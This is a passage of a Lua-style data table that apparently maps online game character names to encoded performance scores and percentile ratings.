["Syphrissa"] = "ET:530/85%LB:755/97%LM:800/96%",
["Darclaw"] = "LT:493/97%LB:630/98%EM:535/79%",
["Jooid"] = "LT:658/95%SB:728/99%LM:925/97%",
["Betony"] = "LT:694/96%EB:541/94%EM:663/85%",
["Corgros"] = "ET:411/86%EB:534/85%EM:603/82%",
["Peeheehee"] = "ET:507/75%EB:590/89%UM:232/45%",
["Bodyhair"] = "ET:517/84%EB:421/83%EM:657/81%",
["Phaedon"] = "ET:624/89%LB:717/96%EM:813/93%",
["Goopile"] = "LT:716/96%LB:717/95%EM:819/91%",
["Ouhai"] = "ET:289/80%RB:383/55%EM:659/93%",
["Lovetoseeit"] = "ET:680/93%SB:785/99%LM:967/98%",
["Xannybarz"] = "LT:760/98%EB:684/94%LM:936/97%",
["Masacur"] = "ET:739/94%LB:756/95%LM:953/96%",
["Merccy"] = "ET:630/91%EB:652/90%LM:896/96%",
["Skandelous"] = "ET:315/88%EB:622/88%EM:616/90%",
["Speedywrath"] = "LT:723/95%LB:726/96%LM:601/95%",
["Moonprincess"] = "RT:156/72%EB:652/92%EM:818/93%",
["Fc"] = "RT:395/60%EB:633/92%EM:713/88%",
["Kochi"] = "ET:721/92%LB:652/96%EM:883/91%",
["Wildshrimp"] = "ET:437/87%EB:670/94%LM:936/98%",
["Threelegs"] = "ET:663/86%SB:763/99%EM:784/81%",
["Swayzebear"] = "LT:732/96%EB:619/91%LM:852/95%",
["Drippin"] = "ET:570/75%EB:702/89%EM:849/88%",
["Balancelul"] = "ET:334/82%LB:765/98%LM:888/96%",
["Ninjajaja"] = "ET:571/86%EB:700/93%EM:739/86%",
["Reta"] = "ET:463/84%EB:487/78%EM:829/90%",
["Mitaotun"] = "ET:689/94%EB:686/94%EM:632/84%",
["Pc"] = "LT:738/97%LB:757/97%LM:956/98%",
["Rov"] = "ET:696/90%EB:676/87%EM:849/88%",
["Tarocreme"] = "ET:655/90%EB:635/91%EM:630/83%",
["Sanjingshou"] = "ST:851/99%SB:808/99%SM:922/99%",
["Amberwing"] = "LT:489/97%LB:764/98%EM:839/93%",
["Klose"] = "ST:763/99%SB:772/99%LM:865/98%",
["Yamibackhere"] = "ET:672/92%EB:649/91%LM:911/98%",
["Addiction"] = "ST:773/99%SB:837/99%SM:1022/99%",
["Stonecowld"] = "ST:807/99%SB:801/99%SM:1046/99%",
["Luoluobj"] = "LT:666/98%LB:773/97%EM:874/92%",
["Quiche"] = "LT:766/97%LB:780/97%LM:941/96%",
["Siegehart"] = "ET:652/89%EB:701/92%EM:777/89%",
["Loopfish"] = "LT:731/95%LB:757/96%LM:964/98%",
["Expiry"] = "LT:551/96%LB:724/98%LM:931/97%",
["Naptimer"] = "ST:815/99%LB:564/96%LM:889/96%",
["Honeysuckle"] = "ET:548/91%LB:572/95%LM:687/96%",
["Alessandri"] = "LT:729/96%LB:602/97%LM:928/98%",
["Matsuri"] = "ET:481/81%EB:564/83%EM:622/79%",
["Cizal"] = "ET:527/87%EB:607/88%EM:587/77%",
["Selaetha"] = "ET:622/82%LB:759/95%LM:955/97%",
["Lofi"] = "RT:539/71%EB:688/88%CM:60/19%",
["Dokhtra"] = "RT:155/57%EB:743/93%EM:850/88%",
["Johnlocke"] = "LB:768/96%EM:873/90%",
["Eternalsins"] = "LT:744/95%SB:780/99%EM:896/93%",
["Petreri"] = "ST:709/99%LB:695/97%SM:930/99%",
["Killdogeater"] = "ET:231/75%LB:758/95%LM:968/97%",
["Thiccachu"] = "ET:372/93%EB:667/84%LM:949/96%",
["Thollysgal"] = "ET:595/78%EB:742/94%EM:780/83%",
["Bradshaw"] = "ET:314/87%EB:670/84%EM:893/92%",
["Upfront"] = "UT:332/45%EB:679/87%RM:482/54%",
["Nelhoraeth"] = "ET:416/94%EB:492/86%EM:551/85%",
["Demikarnage"] = "UT:190/29%EB:645/83%EM:713/76%",
["Halucard"] = "LT:478/96%EB:673/86%EM:905/93%",
["Wargreggles"] = "ST:756/99%LB:730/98%LM:892/98%",
["Roguetick"] = "RT:514/67%EB:504/87%EM:802/83%",
["Namjah"] = "LT:652/98%LB:753/95%LM:954/97%",
["Shekelberger"] = "ET:680/91%LB:779/98%LM:937/96%",
["Husbando"] = "ET:578/78%EB:649/84%EM:893/92%",
["Sinj"] = "UT:116/45%EB:653/84%EM:846/87%",
["Grimgorg"] = "EB:709/89%EM:871/90%",
["Biggs"] = "ST:648/99%LB:736/95%LM:938/95%",
["Boomers"] = "ET:699/90%LB:772/97%LM:936/95%",
["Cawky"] = "LB:778/98%LM:981/98%",
["Bluntsmith"] = "ET:349/90%EB:693/88%EM:890/91%",
["Domsluge"] = "LB:769/96%EM:909/92%",
["Kaliandra"] = "LB:756/96%EM:853/92%",
["Furydice"] = "UT:280/40%EB:752/94%LM:980/98%",
["Hugepumper"] = "LT:765/97%EB:750/94%LM:965/98%",
["Desti"] = "ET:576/77%EB:723/91%EM:913/93%",
["Greeth"] = "EB:723/92%EM:897/94%",
["Kevnadz"] = "ET:610/80%EB:731/92%EM:853/88%",
["Melchisedek"] = "ET:622/81%EB:690/88%EM:727/77%",
["Sometimez"] = "ST:698/99%LB:729/98%EM:901/92%",
["Brogane"] = "ET:684/88%EB:701/89%CM:153/19%",
["Genderbender"] = "ET:419/94%LB:638/95%EM:818/85%",
["Moojoker"] = "SB:814/99%EM:916/94%",
["Raéyth"] = "ET:320/86%EB:710/90%EM:456/77%",
["Enough"] = "EB:715/90%LM:958/97%",
["Lombard"] = "ET:686/88%LB:642/95%EM:855/89%",
["Nazzera"] = "LT:526/97%SB:798/99%LM:931/96%",
["Miscreated"] = "EB:678/85%EM:900/92%",
["Bootynuzzler"] = "ET:711/91%EB:533/89%EM:863/90%",
["Xvd"] = "ET:643/85%EB:683/87%RM:602/68%",
["Drunkpobo"] = "RT:559/73%EB:741/93%EM:907/92%",
["Ex"] = "LT:619/98%LB:717/98%LM:953/97%",
["Ry"] = "LT:473/95%EB:680/87%EM:879/90%",
["Plzclick"] = "ET:670/87%EB:727/92%EM:889/91%",
["Bombb"] = "ET:607/79%EB:692/88%EM:664/90%",
["Deadringer"] = "ET:328/89%EB:681/87%LM:803/96%",
["Lyannastark"] = "ET:623/81%EB:700/89%RM:673/73%",
["Frack"] = "UT:90/33%EB:706/89%LM:942/95%",
["Noctisumbra"] = "LT:536/97%EB:611/94%EM:778/94%",
["Peperoni"] = "ET:565/76%EB:737/93%EM:790/85%",
["Megarea"] = "ET:397/93%EB:680/86%EM:927/94%",
["Dikymoe"] = "RT:458/60%EB:665/85%CM:180/22%",
["Grindinon"] = "EB:694/87%EM:838/86%",
["Shazzaam"] = "RB:441/61%RM:633/70%",
["Astrola"] = "RT:180/54%EB:449/86%EM:574/88%",
["Happyjuliet"] = "RB:486/70%EM:747/82%",
["Lomian"] = "EB:573/82%EM:747/82%",
["Turkeydin"] = "LT:622/98%EB:444/86%LM:773/97%",
["Tahu"] = "RT:485/61%EB:611/83%EM:722/89%",
["Nozomie"] = "RT:61/66%EB:663/93%LM:917/97%",
["Paraxis"] = "ET:463/82%EB:568/94%LM:846/98%",
["Ginzi"] = "RT:241/68%EB:669/89%EM:756/82%",
["Nagetive"] = "UT:126/39%RB:474/68%RM:435/51%",
["Studder"] = "UT:89/28%LB:747/96%LM:970/98%",
["Darkwynn"] = "CT:166/19%EB:543/75%RM:631/70%",
["Gunbrawl"] = "EB:412/82%RM:626/69%",
["Fengxigu"] = "RT:277/74%EB:383/80%RM:637/73%",
["Slayerblaine"] = "UT:84/26%EB:618/84%EM:809/86%",
["Dahbull"] = "UT:117/37%EB:342/75%EM:794/85%",
["Ghelselus"] = "ET:315/80%RB:499/71%RM:643/74%",
["Crescendoll"] = "UT:327/40%EB:633/89%EM:796/89%",
["Retrobot"] = "UT:232/27%EB:666/91%EM:738/80%",
["Blessingz"] = "UT:392/49%EB:582/82%RM:544/59%",
["Sfshlol"] = "RB:380/54%UM:281/33%",
["Duvalie"] = "EB:696/93%EM:882/93%",
["Gilgoria"] = "ET:527/90%EB:627/91%LM:952/97%",
["Jaypee"] = "CT:118/12%LB:633/97%EM:867/91%",
["Phoebeßuffay"] = "EB:484/89%EM:573/88%",
["Yatsuki"] = "CT:69/10%EB:574/79%EM:807/87%",
["Recto"] = "CT:61/5%RB:403/57%EM:643/75%",
["Holyhank"] = "RB:403/57%RM:523/61%",
["Thelodge"] = "CT:137/14%EB:532/75%EM:724/81%",
["Saintpedro"] = "UT:90/28%UB:348/48%RM:629/69%",
["Udderdelight"] = "LB:773/98%LM:920/95%",
["Sattang"] = "CT:86/8%EB:582/81%EM:828/89%",
["Narnija"] = "CT:146/20%LB:718/96%EM:818/92%",
["Peartreehugs"] = "ET:390/89%EB:413/83%EM:808/87%",
["Mandalorian"] = "RB:263/61%RM:593/65%",
["Aquatrix"] = "ET:690/86%EB:522/92%EM:833/87%",
["Huzidashu"] = "EB:549/78%EM:710/78%",
["Lospepinos"] = "EB:665/91%LM:915/96%",
["Schubee"] = "RB:476/66%EM:806/87%",
["Catsik"] = "EB:704/93%LM:943/97%",
["Luuda"] = "RT:179/58%EB:667/91%EM:789/87%",
["Vyctoria"] = "CT:97/9%RB:368/51%RM:545/63%",
["Silvfox"] = "RB:449/65%EM:685/78%",
["Tdc"] = "UB:270/35%EM:679/75%",
["Strog"] = "RT:257/74%EB:435/84%EM:820/88%",
["Kwels"] = "CT:86/8%UB:319/44%UM:290/33%",
["Type"] = "ET:334/83%RB:295/66%CM:93/10%",
["Heyfuqqumang"] = "RT:233/66%EB:554/93%EM:637/91%",
["Dern"] = "RB:252/61%",
["Draymon"] = "UT:345/42%RB:517/74%EM:653/82%",
["Boonee"] = "ET:457/93%EB:463/88%EM:658/75%",
["Grove"] = "CT:35/5%LB:708/95%LM:918/96%",
["Firionna"] = "CT:1/0%UB:317/42%RM:517/60%",
["Billyjolie"] = "CT:72/6%RB:424/60%RM:553/60%",
["Succmythicc"] = "RB:519/72%EM:730/86%",
["Oponos"] = "UT:131/41%RB:367/52%RM:614/71%",
["Mimiko"] = "RT:182/55%EB:606/84%EM:814/88%",
["Azurelock"] = "LT:756/96%LB:753/95%EM:891/91%",
["Silkyjohnsn"] = "ET:655/85%LB:786/98%EM:927/94%",
["Fractals"] = "ST:681/99%LB:719/98%EM:802/84%",
["Hawlucha"] = "LT:755/96%LB:685/98%EM:883/94%",
["Sidious"] = "RT:503/67%LB:781/98%LM:978/98%",
["Sethesis"] = "ET:604/80%SB:805/99%SM:999/99%",
["Evylyn"] = "ET:343/89%EB:566/94%EM:893/92%",
["Telari"] = "ET:739/94%LB:775/97%EM:898/92%",
["Gengàr"] = "LT:747/95%LB:791/98%LM:986/98%",
["Bigthink"] = "RT:536/71%EB:427/85%EM:409/81%",
["Shnackattack"] = "ET:718/92%EB:701/93%LM:902/96%",
["Uhmk"] = "LT:756/96%SB:834/99%LM:960/97%",
["Xiaofei"] = "ET:706/90%LB:773/97%EM:909/92%",
["Igz"] = "LT:757/96%LB:618/96%EM:452/84%",
["Triofakt"] = "LT:746/95%EB:729/92%EM:840/87%",
["Abralin"] = "ET:400/93%EB:727/93%RM:637/70%",
["Flatshead"] = "ET:587/78%EB:543/93%EM:812/91%",
["Dragonmaster"] = "LT:710/95%LB:779/98%LM:946/98%",
["Fourfireball"] = "LT:741/95%LB:666/98%LM:943/96%",
["Shrimpea"] = "LT:764/96%LB:763/96%LM:949/96%",
["Affluent"] = "ET:633/82%EB:595/93%RM:422/74%",
["Etharris"] = "ET:698/90%SB:742/99%LM:967/97%",
["Ldopa"] = "ET:592/79%EB:695/89%EM:752/81%",
["Brogan"] = "ST:798/99%SB:789/99%LM:971/98%",
["Corruptress"] = "ET:734/94%SB:834/99%SM:1006/99%",
["Feed"] = "ST:702/99%LB:684/98%EM:884/92%",
["Rólló"] = "ET:737/94%LB:779/98%LM:925/96%",
["Tonym"] = "ET:327/88%EB:709/94%EM:725/84%",
["Wrongkey"] = "ET:377/92%LB:784/98%LM:992/98%",
["Cheezel"] = "ST:792/99%SB:731/99%LM:948/98%",
["Izomage"] = "ET:576/77%EB:712/91%RM:498/62%",
["Matsih"] = "ET:662/87%LB:772/97%LM:956/96%",
["Steveharvey"] = "ET:367/91%LB:762/97%LM:941/96%",
["Magepigs"] = "ET:622/82%EB:586/81%EM:391/80%",
["Pengiuno"] = "UT:352/45%EB:533/75%EM:794/85%",
["Billypilgrim"] = "RT:432/57%EB:739/94%EM:843/89%",
["Kaspa"] = "LT:746/95%LB:786/98%LM:931/95%",
["Ulyssess"] = "ET:739/94%EB:700/93%EM:844/92%",
["Akumax"] = "LT:743/95%LB:755/95%EM:879/92%",
["Jaided"] = "LT:792/98%SB:812/99%LM:950/96%",
["Imupset"] = "ET:730/93%LB:780/97%LM:937/95%",
["Radburn"] = "ET:577/77%EB:563/80%EM:689/75%",
["Purpleponker"] = "LT:758/96%LB:731/98%LM:882/98%",
["Hypersonic"] = "LT:754/96%SB:757/99%EM:927/94%",
["Ezzen"] = "ET:686/89%SB:785/99%LM:746/96%",
["Jahmon"] = "ET:599/79%EB:545/93%LM:923/95%",
["Getsom"] = "RT:408/56%EB:741/93%SM:1017/99%",
["Wreckrolled"] = "LT:587/97%LB:745/97%LM:982/98%",
["Mekkimaru"] = "CT:26/0%RB:504/67%UM:384/44%",
["Asrielle"] = "ET:741/94%EB:548/93%EM:693/79%",
["Ppneuma"] = "LT:467/95%LB:767/96%LM:980/98%",
["Xzule"] = "LT:757/96%SB:765/99%EM:876/90%",
["Ecilam"] = "ET:440/94%EB:703/93%LM:970/98%",
["Frumpai"] = "ET:711/91%LB:702/97%EM:886/91%",
["Dumbba"] = "LT:759/96%EB:733/93%EM:789/83%",
["Shadowtrix"] = "ET:606/79%LB:679/97%EM:908/92%",
["Ancyro"] = "ET:354/90%LB:592/96%EM:858/90%",
["Beicizai"] = "ET:594/77%EB:609/80%EM:731/77%",
["Xashin"] = "ET:721/92%EB:744/94%LM:938/95%",
["Zennael"] = "ST:781/99%LB:754/95%LM:977/98%",
["Cnyl"] = "ET:636/82%LB:759/95%EM:860/88%",
["Megaboom"] = "LT:759/96%LB:784/98%EM:908/93%",
["Rinascimento"] = "ET:674/88%LB:757/97%LM:924/95%",
["Naadoo"] = "LT:748/95%LB:688/97%LM:807/96%",
["Freeball"] = "ET:707/91%SB:758/99%LM:929/95%",
["Dolflundgren"] = "ET:210/87%EB:609/88%EM:609/81%",
["Despaire"] = "ET:257/77%SB:834/99%LM:984/98%",
["Boozecube"] = "ST:788/99%LB:708/98%LM:941/98%",
["Perturbator"] = "ET:423/93%EB:731/93%EM:745/94%",
["Payness"] = "ET:459/79%EB:639/88%EM:842/92%",
["Nickslick"] = "ET:642/92%EB:581/93%EM:857/94%",
["Smammon"] = "ET:666/88%LB:638/96%EM:825/85%",
["Jarm"] = "ET:259/77%EB:641/83%EM:446/78%",
["Qoqocorn"] = "LT:776/98%EB:646/93%LM:888/97%",
["Pangding"] = "ET:698/94%LB:585/97%LM:901/97%",
["Stylebender"] = "ST:756/99%SB:798/99%LM:965/97%",
["Maplaps"] = "LT:767/98%EB:492/93%EM:621/83%",
["Steveny"] = "ST:797/99%SB:809/99%SM:957/99%",
["Abrahms"] = "ET:716/94%LB:753/96%LM:908/95%",
["Dairron"] = "ST:809/99%SB:807/99%LM:960/98%",
["Xiyew"] = "ET:671/88%EB:680/87%",
["Nagash"] = "ET:623/82%EB:621/81%RM:658/68%",
["Unclegary"] = "ET:573/76%EB:677/86%EM:774/82%",
["Eyeon"] = "EB:638/83%EM:816/84%",
["Dirtytrick"] = "ET:648/84%EB:654/84%LM:810/95%",
["Doublefat"] = "ET:664/87%EB:728/92%EM:843/89%",
["Romanticbs"] = "ET:441/94%EB:701/89%RM:688/73%",
["Ghostsnipers"] = "RT:209/68%EB:641/83%EM:865/89%",
["Moldielox"] = "LT:775/98%LB:780/97%SM:924/99%",
["Ashern"] = "ST:686/99%EB:685/87%EM:617/87%",
["Bonejovi"] = "ST:693/99%EB:708/89%EM:895/91%",
["Mofokilla"] = "LT:542/97%EB:670/85%EM:780/81%",
["Fliegar"] = "ET:254/80%EB:681/87%EM:894/92%",
["Darkx"] = "LT:772/97%SB:809/99%SM:984/99%",
["Treethumper"] = "ST:816/99%SB:781/99%SM:1071/99%",
["Ottothelotto"] = "UT:111/49%LB:788/98%SM:1005/99%",
["Roula"] = "ET:674/89%SB:752/99%SM:1015/99%",
["Zotiyac"] = "ET:268/81%EB:668/86%EM:813/86%",
["Dyng"] = "RT:174/60%EB:644/83%RM:638/68%",
["Fontella"] = "LT:756/97%LB:768/97%EM:878/93%",
["Warrllyz"] = "ET:394/94%EB:706/89%EM:944/94%",
["Thicchobo"] = "LT:744/95%LB:793/98%EM:886/93%",
["Kazx"] = "ET:366/92%",
["Fullsquat"] = "LT:770/97%LB:783/98%LM:963/97%",
["Uvy"] = "RT:521/70%EB:741/94%EM:729/94%",
["Nippyfreeze"] = "ET:673/87%EB:706/89%RM:267/61%",
["Avíendha"] = "RT:560/73%LB:650/96%EM:868/89%",
["Agbar"] = "ET:246/80%EB:672/86%EM:891/91%",
["Asteron"] = "ST:676/99%LB:720/98%EM:844/92%",
["Fud"] = "ET:316/89%EB:703/89%EM:920/94%",
["Boozemann"] = "EB:591/78%UM:269/32%",
["Biggucci"] = "EB:600/76%RM:623/67%",
["Assommoir"] = "ET:704/91%EB:615/94%EM:826/86%",
["Líljon"] = "CT:27/5%EB:748/94%EM:921/93%",
["Cowclassic"] = "LT:610/98%EB:732/92%LM:958/97%",
["Starch"] = "ET:636/85%EB:590/93%EM:438/78%",
["Mead"] = "ST:834/99%LB:682/98%LM:956/97%",
["Althion"] = "RT:462/65%LB:789/98%LM:964/97%",
["Sheed"] = "ET:614/80%EB:745/94%EM:907/93%",
["Kilrod"] = "LT:653/98%LB:779/98%LM:954/98%",
["Bbumblebee"] = "EB:670/84%EM:874/90%",
["Dreadlöck"] = "ET:733/94%LB:792/98%LM:974/98%",
["Oldtougege"] = "EB:717/90%EM:856/88%",
["Xenotank"] = "EB:710/90%EM:907/94%",
["Trela"] = "EB:686/86%EM:756/79%",
["Johnnyringo"] = "LT:624/98%LB:685/97%EM:886/94%",
["Unidentified"] = "ET:723/92%EB:688/88%RM:655/71%",
["Dathel"] = "ET:316/87%LB:760/96%EM:863/89%",
["Shmeegal"] = "ST:709/99%LB:729/98%LM:860/97%",
["Chunlii"] = "ET:669/86%LB:694/97%EM:831/86%",
["Lzgt"] = "RT:502/66%EB:668/86%EM:819/86%",
["Rakeem"] = "ET:274/84%LB:650/96%EM:890/88%",
["Momochi"] = "EB:616/80%EM:707/76%",
["Yuji"] = "LT:734/96%SB:797/99%LM:954/97%",
["Haesh"] = "ST:764/99%LB:771/98%SM:986/99%",
["Colinpowell"] = "RT:492/68%EB:566/92%LM:809/96%",
["Themadone"] = "ET:690/89%EB:726/92%EM:891/93%",
["Beefbologna"] = "ET:231/80%LB:758/98%EM:744/90%",
["Lucipho"] = "LT:755/96%SB:779/99%LM:984/98%",
["Bruhbarian"] = "ET:617/81%LB:708/97%EM:870/90%",
["Magyst"] = "LT:635/98%EB:712/89%EM:873/90%",
["Aikune"] = "RT:173/56%EB:692/93%EM:844/92%",
["Donovan"] = "UT:135/43%RB:360/51%RM:650/71%",
["Zlugger"] = "RB:419/62%RM:496/57%",
["Xivier"] = "ET:316/81%RB:512/74%RM:317/67%",
["Xiaoguangtou"] = "ET:691/94%EB:599/87%EM:779/84%",
["Kurchek"] = "ET:666/82%EB:578/81%EM:668/92%",
["Siegehardt"] = "CT:188/21%EB:627/86%EM:779/84%",
["Hamsterhands"] = "RB:437/63%UM:329/38%",
["Dejävu"] = "UT:84/26%RB:386/52%RM:557/61%",
["Nique"] = "ET:425/93%EB:556/77%EM:851/91%",
["Narecks"] = "RT:202/62%RB:224/56%UM:279/28%",
["Ltnams"] = "ET:389/90%EB:655/89%EM:903/94%",
["Hardlylethal"] = "EB:618/86%EM:703/77%",
["Zomgkittenz"] = "EB:552/76%EM:801/86%",
["Volt"] = "UT:89/29%EB:616/84%EM:863/90%",
["Stardene"] = "EB:580/82%RM:466/54%",
["Protsham"] = "CT:170/19%RB:303/70%RM:250/59%",
["Xjames"] = "RB:366/53%RM:545/63%",
["Treeis"] = "RB:210/51%RM:268/56%",
["Dasandman"] = "UT:122/39%RB:355/51%EM:688/80%",
["Bubbletruble"] = "EB:417/84%RM:541/59%",
["Adaphane"] = "RT:546/69%EB:646/90%LM:840/98%",
["Stonecr"] = "UB:215/27%CM:205/19%",
["Nodress"] = "LB:764/98%LM:938/97%",
["Riceandbeans"] = "RT:522/68%SB:835/99%SM:1020/99%",
["Afiveswagyu"] = "ET:457/94%UB:351/47%RM:552/61%",
["Elunie"] = "RB:456/66%RM:368/72%",
["Overlordetna"] = "RT:158/50%EB:628/87%EM:805/87%",
["Caek"] = "ET:429/92%RB:468/67%RM:419/50%",
["Disrespek"] = "UT:398/49%EB:681/93%EM:715/82%",
["Ragnis"] = "RB:216/52%RM:480/52%",
["Parasiite"] = "LT:578/97%EB:537/93%EM:555/88%",
["Hexmachina"] = "UT:97/31%RB:294/67%CM:119/13%",
["Fjorgyn"] = "EB:539/75%EM:796/86%",
["Hotsondots"] = "EB:705/94%EM:870/92%",
["Faeladin"] = "ET:758/92%EB:587/82%LM:913/96%",
["Eclipser"] = "EB:611/85%EM:846/91%",
["Nighthiro"] = "RB:448/63%EM:717/81%",
["Restomiru"] = "EB:686/92%EM:843/88%",
["Reggan"] = "RB:469/68%EM:708/81%",
["Seagate"] = "UT:145/45%EB:559/78%RM:584/64%",
["Angelzor"] = "RT:433/60%EB:588/83%EM:632/92%",
["Authentic"] = "RB:516/72%EM:831/89%",
["Altpriest"] = "UB:146/35%EM:613/90%",
["Mcbubbly"] = "UT:394/49%RB:465/66%RM:545/64%",
["Ankerkiko"] = "ET:287/77%EB:376/78%RM:598/70%",
["Jaderen"] = "CT:33/4%EB:397/81%RM:336/68%",
["Nikkorine"] = "RB:505/70%RM:650/72%",
["Wisteraeia"] = "UT:273/34%EB:382/81%RM:258/60%",
["Telyris"] = "UT:387/48%RB:516/73%EM:795/88%",
["Mcgrath"] = "ST:777/99%LB:627/97%EM:903/94%",
["Forsetii"] = "RB:508/72%EM:451/80%",
["Adriano"] = "UB:140/34%UM:289/29%",
["Kreetchur"] = "CT:45/3%RB:440/65%RM:323/68%",
["Irezforgold"] = "CT:33/1%UB:253/33%RM:336/69%",
["Cacaboy"] = "ET:666/93%SB:750/99%EM:848/93%",
["Isostere"] = "ET:416/90%EB:667/89%EM:795/85%",
["Fieryjenner"] = "ET:737/94%LB:733/96%EM:769/87%",
["Oracle"] = "ST:790/99%SB:799/99%SM:995/99%",
["Napoleone"] = "LT:761/97%SB:764/99%LM:860/98%",
["Pikamage"] = "ET:661/87%LB:761/96%LM:930/95%",
["Gailshadow"] = "ET:668/87%LB:688/97%EM:862/89%",
["Ridious"] = "ET:715/92%EB:742/94%EM:882/92%",
["Democritus"] = "RT:514/69%EB:679/88%LM:969/97%",
["Kaiyy"] = "ET:709/91%EB:667/84%LM:941/95%",
["Qingg"] = "ET:660/87%LB:667/98%EM:489/87%",
["Haobaby"] = "ET:609/81%EB:462/84%RM:644/72%",
["Putasucia"] = "ET:674/88%LB:770/97%LM:933/95%",
["Oosted"] = "LT:761/96%LB:776/97%LM:990/98%",
["Barvin"] = "ET:674/88%EB:584/81%EM:675/78%",
["Kaela"] = "LT:494/98%LB:768/96%LM:922/96%",
["Fujikokano"] = "LT:747/95%LB:782/98%LM:967/98%",
["Berg"] = "ET:432/94%LB:764/96%SM:1031/99%",
["Tiptaps"] = "ST:794/99%SB:800/99%SM:943/99%",
["Celebras"] = "ET:724/93%EB:708/90%EM:762/81%",
["Raizojun"] = "ST:727/99%LB:769/97%LM:947/96%",
["Justin"] = "ET:732/94%LB:771/97%LM:960/97%",
["Tunatw"] = "ET:604/80%EB:580/77%LM:934/95%",
["Seventou"] = "LT:776/98%SB:784/99%SM:961/99%",
["Xantra"] = "LT:751/96%LB:773/97%EM:880/93%",
["Davethelock"] = "ET:736/94%LB:749/95%EM:774/83%",
["Royalt"] = "ET:575/76%LB:740/96%LM:925/95%",
["Gigihadid"] = "ST:780/99%LB:756/97%LM:932/97%",
["Foreverlove"] = "ET:721/92%LB:651/96%RM:692/74%",
["Bignipps"] = "ET:603/79%EB:493/86%EM:772/80%",
["Stormhardt"] = "ET:725/93%EB:602/93%EM:786/82%",
["Professork"] = "ET:637/84%LB:730/95%EM:637/93%",
["Coldcoke"] = "ET:677/91%EB:618/94%EM:749/79%",
["Pandapet"] = "ET:577/77%EB:429/86%RM:601/66%",
["Clintstevens"] = "LT:440/95%EB:726/92%EM:889/92%",
["Rintaro"] = "ST:835/99%LB:778/97%UM:174/49%",
["Rokaro"] = "ET:591/79%EB:733/92%EM:812/85%",
["Cinnister"] = "ET:285/83%EB:672/85%EM:790/82%",
["Rtv"] = "ET:738/94%EB:645/83%",
["Pumpiro"] = "ET:692/90%EB:619/86%LM:732/95%",
["Secretsweet"] = "ET:738/94%EB:617/85%EM:705/80%",
["Fadeese"] = "ET:708/90%EB:606/94%RM:640/68%",
["Cyntrixx"] = "LT:756/97%LB:654/97%LM:967/98%",
["Bashin"] = "ET:342/90%LB:754/95%EM:819/87%",
["Fruitovo"] = "ET:638/84%LB:775/98%LM:955/97%",
["Elsb"] = "ET:626/83%EB:487/89%EM:871/91%",
["Sifting"] = "LT:618/98%LB:655/96%EM:851/88%",
["Alîce"] = "ST:707/99%LB:770/97%EM:902/91%",
["Smokz"] = "ST:739/99%LB:777/97%LM:965/97%",
["Waterbubbler"] = "ET:597/80%LB:755/95%LM:940/96%",
["Httpnick"] = "LT:788/98%SB:802/99%LM:967/97%",
["Hagromier"] = "LT:617/98%LB:644/95%LM:911/95%",
["Lildents"] = "LT:433/95%EB:674/85%EM:899/92%",
["Daunte"] = "ET:717/92%EB:744/94%EM:859/89%",
["Spotdodge"] = "ET:378/92%LB:772/98%LM:973/98%",
["Civex"] = "LT:527/96%EB:693/88%EM:769/94%",
["Lovecraft"] = "ET:713/92%LB:785/98%EM:916/94%",
["Vollathar"] = "LT:757/96%LB:771/98%LM:881/95%",
["Muhammed"] = "ET:635/84%LB:687/97%EM:902/92%",
["Wulf"] = "LT:781/98%SB:825/99%SM:973/99%",
["Unglaus"] = "ST:807/99%LB:773/98%EM:882/94%",
["Eiline"] = "ET:420/76%EB:661/90%EM:813/91%",
["Spewer"] = "LT:738/95%EB:729/94%LM:927/96%",
["Tdy"] = "LT:780/98%SB:788/99%LM:909/98%",
["Dyea"] = "LT:731/95%SB:809/99%LM:777/98%",
["Orangem"] = "LT:636/98%LB:791/98%EM:905/94%",
["Grf"] = "LT:731/95%LB:752/96%LM:955/97%",
["Drspicy"] = "LT:772/97%LB:791/98%LM:806/96%",
["Psywar"] = "LT:760/97%LB:783/98%LM:951/97%",
["Shinysidez"] = "ET:322/86%EB:740/93%EM:922/94%",
["Duk"] = "LT:651/98%LB:731/98%LM:926/95%",
["Drunkle"] = "ST:823/99%SB:831/99%SM:1006/99%",
["Òòmkin"] = "ET:568/90%LB:634/97%EM:835/93%",
["Circuz"] = "RT:483/64%EB:581/76%EM:729/76%",
["Alienufo"] = "LT:756/97%LB:765/97%LM:958/98%",
["Nastyvicious"] = "ET:347/88%EB:676/87%EM:881/92%",
["Angerbang"] = "ET:662/93%LB:618/95%LM:787/96%",
["Yidao"] = "CT:33/8%RB:411/55%UM:372/39%",
["Gnarli"] = "ET:711/91%EB:732/92%LM:821/96%",
["Rsk"] = "ST:789/99%SB:809/99%SM:995/99%",
["Nwcrow"] = "ST:688/99%LB:766/96%EM:920/94%",
["Moredemonpie"] = "LT:754/96%LB:772/97%EM:899/94%",
["Tion"] = "ET:708/91%LB:792/98%LM:950/96%",
["Stoneskin"] = "ET:599/85%LB:724/96%LM:922/97%",
["Karou"] = "ET:711/92%EB:733/93%LM:935/95%",
["Yeezly"] = "ET:656/86%EB:718/91%RM:673/70%",
["Morrows"] = "LT:673/98%LB:616/95%EM:702/93%",
["Kryptonadene"] = "ET:624/91%EB:694/93%EM:664/81%",
["Sheezza"] = "LT:758/96%LB:754/95%LM:963/98%",
["Jpgalahad"] = "LT:440/95%EB:722/91%EM:722/79%",
["Bavvuk"] = "RT:174/60%EB:711/89%EM:875/89%",
["Pattyob"] = "ET:647/84%EB:682/87%RM:481/54%",
["Skissors"] = "ET:714/91%EB:560/91%EM:751/79%",
["Toosieslide"] = "LB:776/97%SM:1079/99%",
["Chickenez"] = "ET:282/83%EB:624/81%EM:746/81%",
["Eneldy"] = "RT:381/50%LB:765/97%LM:910/96%",
["Azzith"] = "LT:777/98%LB:788/98%EM:927/94%",
["Nibby"] = "RT:213/71%EB:726/91%EM:867/89%",
["Solrun"] = "ET:373/92%EB:626/81%EM:475/80%",
["Adysious"] = "LT:463/96%EB:698/89%EM:867/89%",
["Igthot"] = "UT:346/48%EB:511/88%EM:475/80%",
["Trollrun"] = "ET:359/90%LB:786/98%LM:939/95%",
["Jaythekilla"] = "LT:786/98%LB:773/98%LM:936/97%",
["Tedward"] = "RT:446/59%SB:835/99%LM:973/98%",
["Saern"] = "EB:654/84%EM:854/88%",
["Protomann"] = "ET:610/79%EB:677/87%RM:702/74%",
["Thehownd"] = "LT:443/95%LB:744/98%LM:761/95%",
["Nutguzzler"] = "EB:641/83%UM:364/42%",
["Hydel"] = "ET:631/82%EB:734/93%EM:834/87%",
["Oldvirgin"] = "CT:43/9%EB:624/81%UM:473/49%",
["Cateyes"] = "ET:612/80%EB:549/90%EM:916/91%",
["Zugzug"] = "ET:672/91%LB:765/97%LM:916/97%",
